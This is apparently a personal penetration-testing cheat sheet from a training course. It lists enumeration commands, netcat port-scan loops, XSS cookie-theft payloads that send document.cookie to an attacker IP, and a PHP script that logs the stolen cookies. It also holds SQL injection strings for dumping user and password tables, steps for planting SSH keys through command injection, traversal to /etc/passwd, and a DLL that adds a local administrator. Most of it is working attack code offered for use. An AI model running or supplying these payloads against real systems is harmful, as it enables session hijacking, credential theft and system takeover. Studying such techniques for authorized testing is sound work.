/////////////////// Linux Enumeration \\\\\\\\\\\\\\

find / -type f -perm /4000 2>/dev/null --> find suid / guid
find /dev -type f --> find writeable files in /dev
find / -type d -writable --> find writeable dirs

echo “a bunch of text” | tr ‘ ‘ ‘\n’ --> translate spaces to endlines for /etc/passwd

---------------------------
check encoding on creds
rot13
base64
--------------------------

Check CRONTAB

find /etc/cron* -writable 
find /etc/cron* --> look for something weird
cat /etc/crontab --> look for something weird
cd /etc/cron.d --> look for something weird


///////////////////// Scans \\\\\\\\\\\\\\\\\

nmap <IP> --script smb-os-discovery
nmap <IP> -sT -Pn -p 80 --script http-enum
nmap <IP> --script smb-os-discover -p 445
nmap --script banner <IP> -p port

proxychains nikto -host <IP>

getend services <port> --> resolve a ports service through nsswitch.conf

ken scan -----------------

for i in {20..22000}; do nc -nzvw1 <IP> $i 2>&1 & done | grep -E 'succ|open$'

--------------------------


scan script --------------

#!/bin/bash

for i in {1..254}
do
	nc -nzvw1 192.168.1.$i 1-65535 2>&1 &
done | grep -E 'succ|open$'

---------------------------



///////////////////// Web Site scraping \\\\\\\\\\\\\\\\\

wget -r <IP of website> 

grep -Er '[0-9a-zA-Z]{20}' | grep -vE 'fonts|{*}|js|Binary|css'



///////////////////// XSS \\\\\\\\\\\\\\\\\\\\\\\\

1. post to the blog / check from another browser that the post saved on the server

2. test for XSS ( all text blocks )
	
	<script> alert('hell0') </script>
	<script> alert(/hell0/) </script>
		 
3. print out your own cookie
	
	<script> alert(document.cookie) </script>

PHPSESSID=......

4. upload this to the blog
	
	<script> document.location="http://<IP>/cookie_stealer1.php?username="+document.cookie; </script>

5. create a cookiefile.txt on the victim or on your own webserver


6. upload the cookie_stealer.php file to a file upload function or host the file on your own web server

<?php
$cookie = $_GET["username"];
$steal = fopen("/var/www/html/cookiefile.txt", "a+");
fwrite($steal, $cookie . "\n");
fclose($steal);
?>

7. or use a nc listener to catch the cookie ( any computer can see our ops station floating ip address ) 

<script> document.location="http://10.50.24.132:8001? username="+document.cookie;</script>




////////////////////// SQL Injection \\\\\\\\\\\\\\\\\\\\

Log into SQL DB
----------------
shell> mysql --user=webuser --password=sqlpass

CREDS IN DATABASE --> grep -r localhost OR grep -i pass *

Once on box → look for a .php file with “//Set up DB connection”
	→mysqli_connect(‘localhost:3306’,’username’,’password’,’database’)


sql db commands
----------------
show databases;
show tables;
use <database>;
@@version

---------------

practice test

url/pick.php?product=7 or 1=1 --> injectable

url/pick.php? union select 1,2,3

url/pick.php?product=7 union select table_schema, table_name, column_name from information_schema.columns	

url/select username,user_id,name from siteusers.users

---------------


1. test for vulnerability / injection

Ford' OR 1='1;# --> massage the quotes

2. use a union statement, see how many columns you need
 
Ford' UNION SELECT 1,2;# --> 1,2,3 --> 1,2,3,4

3. enumerate database information schema --> table_schema is database name

Ford' UNION SELECT null,table_schema,table_name, column_name FROM information_schema.columns;# 

4. get information from database linked to webserver specifically

	^^ WHERE table_schema=database();#          <--------------

5. enumerate specific information 

Ford' UNION SELECT 1,2,name,password from database.users;#

--> make sure to check for 0 indexed user ids

----------------------------------
URL / GET request injection

ur/login.php?username=bob’ OR 1=’1 & password =bob’ OR 1=’1

1. if blank page --> not injectable OR if dumps table --> injection point

?selection=1 OR 1=1 

2. do the rest of the above steps


----------------------------------
LOGIN PAGE

-ALWAYS try to dump username/password database like this --> login.php?username=bob' or 1='1 & passwd=bob'or 1='1 !!!!!!


try injecting into the user input boxes 

AND

inject into the url --> 
	
	login.php?username=tom' or 1='1 and passwd=tom' or 1='1

	login.php?username=tom' or 1='1 & passwd=tom' or 1='1

view page source --> to see what the names of the variables are (password or passwd)
 


////////////////////// Command Injection \\\\\\\\\\\\\\\\

; && || --> separate commands 




///////////////////// Plant SSH Keys \\\\\\\\\\\\\\\\\\\\

1. ssh-keygen --> make id_rsa.pub

2. using command injection--> make .ssh director and authorized keys file
on target box

3. echo ' < id_rsa.pub > ' > ~/.ssh/id_rsa.pub 

4. ssh to that box




////////////////////// Directory Traversal \\\\\\\\\\\\\\\

url/image.php?file=../../etc/passwd


../../../../../../../../../../../../../../../../../etc/passwd

		/etc/group
		/etc/hosts
		/etc/resolv.conf
		/etc/nsswitch.conf



////////////////////////////   Reverse Engineering   \\\\\\\\\\\\\\\\\\\\\\\\

Static analysis

--use sha1sum to compare
--diff to compare




///////////////////////////	Windows Escalation	\\\\\\\\\\\\\\\\\\\\\\\   


check for vulnserver --> port 9999


  

-- find the tasks / services being run 
schtasks /query /fo LIST /v | select-string -pattern "Task to Run" -Context 0,6 |  more

or 

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"

--enumerate permissions on directories / executables

icacls <filename or directory

--search for dlls in the source code 

findstr dll <source code>

--create dll

#include <windows.h>
int execCommand()
{
 WinExec("net localgroup Administrators user /add", 1);
 return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
 execCommand();
 return 0;
}

--compile dll --> change example / source to dll name

i686-w64-mingw32-g++ -c -D example.dll source.c && i686-w64-mingw32-g++ -shared -o example.dll source.o -Wl,--out-implib,example.a

--download on target
use simple http server 

OR

base64 file | xclip -selection clipboard

certutil -decode file.txt file.exe

--reboot machine
shutdown -r

REGISTRY KEY for usernames/passwords
hklm/software/microsoft/windows nt/currentversion/winlogon
